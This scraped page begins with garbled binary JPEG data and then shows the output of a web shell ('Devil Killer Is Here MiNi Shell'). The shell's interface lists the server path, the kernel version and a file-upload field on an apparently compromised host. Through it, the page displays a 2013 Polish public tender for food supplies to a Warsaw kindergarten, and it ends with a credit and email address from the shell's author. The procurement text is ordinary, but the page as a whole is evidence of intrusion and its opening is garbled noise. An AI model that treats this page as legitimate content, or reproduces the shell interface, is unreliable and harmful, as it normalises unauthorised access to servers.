JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/477944-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 5 pakietów</b><br>
<b>Numer ogłoszenia: 477944 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 14 , ul. Senatorska 24, 00-095 Warszawa, woj. mazowieckie, tel. 22 827 02 40, faks 22 827 02 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p14w-wa.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 5 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 5 pakietów zgodnie Z SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.51.00.00-6, 15.53.00.00-2, 03.22.00.00-9, 03.14.25.00-3, 15.10.00.00-9, 15.13.11.30-5, 03.31.10.00-2, 15.89.60.00-5, 15.80.00.00-6, 41.11.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p14w-wa.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 14
ul.Senatorska 24a
00-095 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 10:00, miejsce: Przedszkole Nr 14
ul.Senatorska 24a
00-095 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo i wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka typu bagietka,Bułka wrocławska-masa netto 280g,świeża,Bułeczki ciemne z ziarnem typu mała kajzerka świeże,Chleb biały, duży, krojony-masa netto580g-świeży,Chleb razowy z ziarnem,krojony-masa netto 500g-świeży,Chleb tostowy pszenny lub z ziarnem 500g,Chałka -masa netto 300g,świeża,Ciasto z owocami,Drożdżówka,rogalik-masa netto 55g,świeża,Drożdżówka z budyniem lub serem-masa netto 80g, świeża,Groszek ptysiowy,Sernik,Słomki ptysiowe,Wyroby cukiernicze na wagę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz - kl.I lub II Rozporządzenie KomisjiWEnr 1093/97,Ananas świeży kl.I,Banany kl.I lub II,wg Rozporządzenia Komisji(WE)nr 2257/94,Botwina w pęczkach świeża,sprężysta,bez śladów nadpsucia,Brokuły-świeże o zwartych intensywnie zielonych różyczkach,bez pleśni i śladów nadpsucia,Brzoskwinie lub morele-dojrzałe, bez sladów obicia i nadpsucia-kl.I,Buraki- czerwone, okrągłe, konsumpcyjne, wielkość średnia;Cebula zwyczajna -wielkość średnia,bez śladów nadpsucia;Cytryny-soczyste o gładkiej skórce,bez śladów nadpsucia, kl.I;Chrzan+ koper+ czosnek-zestaw do kiszenia;Czosnek, duże główki o lekko fioletowym zabarwieniu, świeży bez cech nadpsucia;Fasolka szparagowa długa, żółta, bez łyka, bez śladów nadpsucia;Gruszka, soczysta-typu konferencja lub klapsa, bez cech nadpsucia;Jabłka, soczyste, słodko winne, typu kortland, ligol, champion, delikates, rubin, jonagored- nie obite,wielkość średnia-bez cech nadpsucia;Kalarepka;Kalafior świeży, różyczki białe, zwarte, bez śladów nadpsucia;Kapusta czerwona-główka-2-2,5kg.,zwarta,zdrowa bez śladów nadpsucia;Kapusta biała główka-2-2,5kg.,zwarta,zdrowa bez śladów nadpsucia
Kapusta kiszona, jasna, nie przekwaszona o delikatnym zapachu, opak. plastikowe wiaderko o poj.5 kg;Kapusta pekińska- główka 1-1,5kg.zwarta, zdrowa bez śladów nadpsucia;Kapusta włoska główka - ok.2kg.,zwarta,zdrowa bez śladów nadpsucia;
Kiwi-sztuki na palecie -nie w koszyku-twarde,dojrzałe bez cech nadpsucia, kl.I;Koperek zielony-pęczek, świeży, nie zwiędły o wadze określone sezonowo, barwie intensywnie zielonej i właściwym zapaczu, bez cech nadpsucia;Maliny kl.I bez cech nadpsucia;Mandarynki bezpestkowe, soczyste, skórka gładka, łatwo odchodząca; bez cech nadpsucia;Młode ziemniaki, białe-zdrowe, bez cech nadpsucia Młoda włoszczyzna, bez cech nadpsucia(pęczek);Młoda marchewka-typu karotka, bez cech nadpsucia(pęczek);Młoda kapusta-sezonowo, bez cech nadpsucia
Marchew, umyta, średniej wielości, bez cech nadpsucia;Melon żółty kl.I, zdrowy bez cech nadpsucia;Natka pietruszki, świeża-pęczek, nie zwiędła, o wadze określonej sezonowo, intensywny zielony kolor, bez cech nadpsucia;Nektarynki-dojrzałe, średniej wielkości, nie obite, kl.I bez cech nadpsucia;Ogórki kiszone, nie przekwaszone, twarde bez cech nadpsucia. Opak. wiaderko o poj.6kg;Ogórki świeże-krótkie lub węże, szklarniowe lub gruntowe- sezonowo, twarde bez cech nadpsucia, kl.I;Papryka czerwona-dojrzała, świeża, jędrna, bez cech nadpsucia kl.I
Pietruszka, korzeń zdrowy, bez brązowych przebarwień wewnątrz, nie zwiędła, wielkość średnia, bez cech nadpsucia;Pieczarki świeże, bez plam i cech nadpsucia
Pomarańcza, typu Nowelina, gładka, jasna, cienka skórka, bez cech nadpsucia kl.I
Pomidor mięsisty, świeży, czysty, czerwony-produkt polski, w opakowaniu 6kg. kl.I extra, bez cech nadpsucia;Por, zdrowy, zwarty, bez cech nadpsucia;Rzodkiewka- pęczek, czerwona okrągła, świeża, słodka nie piekąca, bez cech nadpsucia
Sałata świeża, intensywnie zielona, bez cech nadpsucia;Sałata lodowa, świeża bez cech nadpsucia;Seler, biały, umyty, wielkość średnia, bez cech nadpsucia
Szaron (kaki) dojrzały, bez cech nadpsucia;Zioła świeże w pojemnikach;Szczypiorek- pęczki, świeży, cienki, wielkość sezonowa, sprężysty bez cech nadpsucia
Śliwki typu Węgierka, Stanley, w dojrzałości konsumpcyjnej, odchodzące od pestki, bez cech nadpsucia;Truskawki, odmiana konsumpcyjna-polska, zdrowa, dojrzała, bez cech nadpsucia;Winogrona ciemne-słodkie, bez pleśni i cech nadpsucia, kl.I
Winogrona jasne-słodkie, bez pleśni i cech nadpsucia, kl.I;Ziemniaki - irga konsumpcyjna, umyta, zdrowa, nie nad mrożona, skórka bez zielonych przebarwień, bez kiełkujących oczek, wielkość średnia, bez cech nadpsucia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i wędlina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso
Cielęcina zadnia, świeża- nie rozmrażana kawałki 1-1,5 kg;Filet z indyka w przedziale wagowym 1 kg -1,5kg,świeży, bez skóry, bez kościnierozmrażany;Łopatkawieprzowa, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża nie rozmrażana; kawałki ok.1- 1,5 kg;Łopatka wołowa z młodych sztuk, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeże nie rozmrażane kawałki po 1- 1,5 kg
Porcje rosołowe ;Piersi z kurczaka, świeże nie rozmrażane, pojedyncze
Skrzydła z indyka;Szynka wieprzowa bez kości, bez tłuszczu kawałki wielkości 1- 1,5 kg, świeże, nie rozmrażane;Schab środkowy bez kości, o średnicy nie większej niż 10cm, świeży, nie rozmrażany, kawałki 1,5- 2 kg;Udka kurczaka świeże, nie rozmrażane;Udziec z indyka, bez skóry, bez kości, świeży- nie rozmrażany 50-70 dkg
Wołowe z udźca, bez kości kl.I ,świeże, nie rozmrażane, z młodych sztuk 1- 1,5 kg
Słonina;Smalec;Wędliny - świeże, pakowane hermetycznie o przydatności do spożycia przynajmniej 7 dni od momentu dostarczenia;Filet z indyka pieczony, produkt blokowy grubo rozdrobniony, mięso z indyka 72,5%;Kiełbasa krakowska parzona, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe 70,90%
Kiełbasa biała surowa;Kiełbasa żywiecka, średnio rozdrobniona, podsuszana, wędzona, 100g gotowego produktu uzyskano ze 121 g mięsa wieprzowego
Kiełbasa cienka typu podwawelska, toruńska, mięso wieprzowe 84,9%;Kabanosy, kiełbasa średnio rozdrobniona, wędzona, parzona, podsuszana, 100 g gotowego wyrobu uzyskano z 97 g mięsa wieprzowego i 18 g mięsa drobiowego;Parówki wieprzowe odtłuszczone, mięso wieprzowe 60%, mięso drobiowe 3%
Pasztet tradycyjny, domowy;Polędwica sopocka, wysoko wydajna, mięso wieprzowe 74%;Salami- mięso wieprzowe 64%, mięso wołowe 32%;Szynka wiejska- wędzonka parzona, mięso wieprzowe 83%;Szynka Prezesa, z komina, 78% mięsa wieprzowego
Wyroby drobiowe /szynka, polędwica/.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w lekkim syropie, opakowanie - puszka 580g;Barszcz biały op.66g;Biszkopty op.140 g;Budyń waniliowy z cukrem;Bułka tarta opak.450 - 500 g;Brzoskwinie połówki w lekkim syropie, opak. 850g;Batonik czekoladowy - szt.50g;Barszcz czerwony karton 1litr;Brokuły mrożone- opak. torba foliowa o wadze 2000g;Brukselka mrożona -opak. torba foliowa o wadze 2500g;Barszcz ukraiński - opak. torba foliowa o wadze 2500g;Buraki wiórki tarte -opak. Torba foliowa o wadze 500 g;Chrzan opak. 160-180 g
Ciasteczka w kształcie misia z nadzieniem;Cukier puder opak.500g;Cukier biały - drobny kryształ -opak. 1 kg;Cukier waniliowy 16g;Czekolada - opak.25 - 30 g
Cukierki miękkie opak. 1 kg;Ciastka owsiane z ziarnem op.300g 
Dżem truskawkowy nisko słodzony, wsad owocowy ~40g owoców/100g produktu, opak. słoik 300g;Drożdże spożywcze opak.100 g;Dorsz plamiak - płaty, nie więcej niż 3% glazury technologicznej, opak.SHP;Fasolka szparagowa mrożona, zielona cięta, oczyszczona - opak.torba foliowa o wadze 2500g;Fasolka szparagowa mrożona, żółta cięta, oczyszczona - opak.torba foliowa o wadze 2500g;Frytki mrożone -opak.torba foliowa o wadze 2500g;Fasola biała, drobna -opak. torba 0,5 kg;Groszek mrożony -opak.torba foliowa o wadze 2500g;Groch łuskany, połówki - opak. 0,50kg
Groszek konserwowy opak. puszka 200-300g;Galaretka owocowa w pojemniku plastikowym 175g;Galaretka owocowa w proszku, opak. torebka 75g
Herbata owocowa -(hibiskus, aronia, jabłko, jeżyna, owoc dzikiej róży,cytryna,brzoskwinia,jagoda,truskawka,mięta) opak.20 szt x 2g;Herbata czarna ekspresowa, opak. - 100 x 2g;Herbatniki - tradycyjna receptura, polecane do wypieków, opak.100g;Jogurt owocowy  - ze szczepami Acti Regulator 120g
Jogurt pitny naturalny opak.1 litr;Jaja świeże , nie starsze niż 7 dni od daty pakowania, o oznaczeniu:3-jaja z chowu klatkowego - A -L duże 63-73g;Jajko czekoladowe- szt.20g;Kawa rozpuszczalna zbożowa -opak.150g;Kakao rozpuszczalne z witaminami, opak.600g;Kasza gryczana prażona cała - opak. 1 kg.;Kasza jęczmienna, perłowa, biała, łamana drobna - opak. 1 kg;Kasza manna opak. 1 kg
Kasza kuskus;Ketchup łagodny, opak. 500g;Kisiel z cukrem, różne smaki, opak torebka
Koncentrat pomidorowy- zawartość ekstraktu 30% +- 2% - opak. słoik 950g
Krem czekoladowy z orzechami laskowymi do smarowania-opak. słoik 500g - wartość energetyczna w 100g produktu 530kcal, białka 6,4;Kukurydza konserwowa , puszka 340g po odsączeniu masa netto 280g;Koncentrat pomidorowy poj.210g
Kwasek cytrynowy 20g;Koncentrat buraczany poj.200 - 300g
Kuleczki kokosowe białe, opak.200g;Kostka rybna z mintaja, głęboko mrożona, panierowana kl.I - 75g;Karp-płaty bez ości ze skórą kl.I
Kalafior różyczki, mrożony- opak. torba foliowa o wadze 2500g;Kukurydza- opakowanie torba foliowa o wadze 2500gLody-sok zamrożony poj.50-70 ml;Lody czekoladowe - pudełko 1 kg.Liść laurowy-ziele suche - op. 6gLizak w kulce owocowy 12g;Łosoś wędzony na zimno,plastrowany, zapakowany próżniowo na tacce, masa 100g;Mintaj -płaty, nie więcej niż 3% glazury technologicznej, opak. SHP;Makrela wędzona, świeża, duże tuszki, zapakowana hermetycznie;Mikołajki świąteczne z czekolady 20g;Majeranek- ziele suche, otarte-op.8g;Majonez dekoracyjny, opak. słoik 400ml;Makarony różne Durum 100%- opak.0,5 kg;Makaron zacierka - opak.0,25g;Mąka pszenna typ 480 - opak. 1 kg.;Mąka ziemniaczana - op.0,5 kg.;Miód naturalny pszczeli-wielokwiatowy nektarowy opak.słoik 400g-wartość energetyczna w 100g produktu 1334kj/319kcal
Musztarda, opak.150ml;Masło extra o zawartości tłuszczu 82%bez dodatku tłuszczów roślinnych- opakowanie folia aluminiowa z nadrukiem -200-250g
Masło roślinne, opak. kubek 250g;Mleko spożywcze, pasteryzowane, homogenizowane- zawartość tłuszczu 3,2%.Opak.folia 1 litr- w tym ?  ilości z dotowanego Programu Agencji Rynku Rolnego-Szklanka mleka;Mleko smakowe 200 ml
Margaryna 200g;Mleko pasteryzowane 2% w kartonie opak. 1 litr;Marchewka mini -mrożona, opak. torba foliowa o wadze 2500g;Marchewka z groszkiem, mrożona, opak.torba foliowa o wadze 2500g ;Marchew kostka- mrożona-opak. torba foliowa o wadze 2500g;Mieszanka kompotowa, mrożona-opakowanie torba foliowa o pojemności 2500g;Mieszanka warzywna(kalafior, brokuły, marchew)mrożona, opak. torba foliowa o wadze 2500g;Napój z mleka fermentowanego z żywymi kulturami bakterii, owocowy, opak. butelka 100ml;Owoce suszone -chips-opak.20g;Ogórki konserwowe opak. słoik 0,9l;Olej rzepakowy z pierwszego tłoczenia - opak.1 litr
Oliwa z oliwek z pierwszego tłoczenia, na zimno, opak. butelka szklana 0,5 l
Owoce suszone opak.100g;Puszysty serek do smarowania, opak. kubek 150g
Paluszki rybne panierowane, mrożone kl.I;Pierniczki nadziewane w czekoladzie 
Pieprz czarny naturalny- opak.20g;Płatki do mleka-kwadraciki z pełnego ziarna pszenicy o smaku cynamonowym-opak.500g.Wartość energetyczna w 100g produktu 412 kcal.;Pizza mrożona opak.1 kg;Powidła wsad owocowy ~ 40g owoców/100g produktu, opak. słoik 300g;Płatki owsiane górskie błyskawiczne -opak.400g-zawartość energetyczna w 100g produktu 366kcal, węglowodany przyswajalne 62,40g
Proszek do pieczenia 15g;Przyprawa warzywna do potraw, sucha-warzywa suszone 15,5%, opak.200-220g;Przyprawa w płynie 1l;Pianka w czekoladzie, opak.500g;Przyprawa do kurczaka  30g;Paluszki typu sól, mak itp. Opak. 70g
Przecier ogórkowy opak.  słoik 300g;Ryż biały długoziarnisty opak. torba papierowa 1 kg., wartość energetyczna w 100g produktu 344kcal.;Rogalik z nadzieniem 55g
Rosół z kury bez glutaminianu sodu  0,9-1,2g;Sok malinowy, aroniowy, wiśniowy, zagęszczony, pojemność butelki szklanej 420ml. Bez konserwantów, pasteryzowany.
Sok owocowy, nieprzecierowy-jabłka, pomarańcze, ananas, winogrona,cytryny,gruszki,nektaryny,mango,morele,opak. butelka szklana o poj. 1 litr.
Sok przecierowy na bazie marchwi i owoców, opak.butelka szklana o poj.1 litr
Soczki owocowe, opak. kartonik 0,2l;Szczaw konserwowy, opak. słoik 350g
Sól kamienna jodowana, opak. torba foliowa 1 kg.;Sos do spaghetti, opak. słoik 520g
Serek wzbogacony o witaminę D, opak. kubeczek 50g;Ser topiony kremowy, 40% tłuszczu w 100g produktu;Ser żółty łagodny, zawartość tłuszczu 45%, sera w serze 90%, dotowany  z Programu Agencji Rynku Rolnego-Szklanka mleka
Ser mozarella 125g;Serek waniliowy opak.150-175g;Serek naturalny w granulkach, opak. 200g;Szpinak liście krojone, mrożony, opak.torba foliowa o wadze 2500g
Śmietanka do ciast i deserów 30% tłuszczu, wartość energetyczna w 100g produktu 290kcal, składnik dodatkowy:stabilizator-karagen, opak. kartonik 500ml
Śmietana do zupy zaw.tłuszczu 18%, opak. kubek 400ml;Śledzie w oliwie paczkowane
Śmietana zaw.tłuszczu 18%,karton o poj.0,5l;Truskawka mrożona, opak.torba foliowa o wadze 2500g;Twaróg półtłusty, kl.I , zawartość tłuszczu 3,5%-opak. folia o pojemności 250g;Tuńczyk w sosie własnym kawalki opak. 170g;Układanka Świąteczna z czekoladek opak.75g;Woda mineralna w butlach o poj.19 l;Woda mineralna poj. 1,5 l;Woda mineralna poj  0,5 l;Włoszczyzna cztero składnikowa, opak. torba foliowa o wadze 2500g;Wafelek z nadzieniem mlecznym w czekoladzie, opak.37g;Wafle ryżowe op.100g;Wafelki o średnicy 20/30 cm opak. 250g;Wata cukrowa op.100g;Ziele angielskie - opak.15g;Zioła suszone, mieszanka rozmarynu, bazylii, majeranku, mięty, tymianku,szałwi, cebuli, czosnku, opak.torebka 35g;Żelki-opak.100g;Żelatyna spożywcza opak. 50g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2, 03.14.25.00-3, 03.31.10.00-2, 15.89.60.00-5, 15.55.50.00-3, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyroby garmażeryjne-świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi z serem- nie mrożone;Pierogi z mięsem- nie mrożone;Pierogi z kapustą i grzybami- nie mrożone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com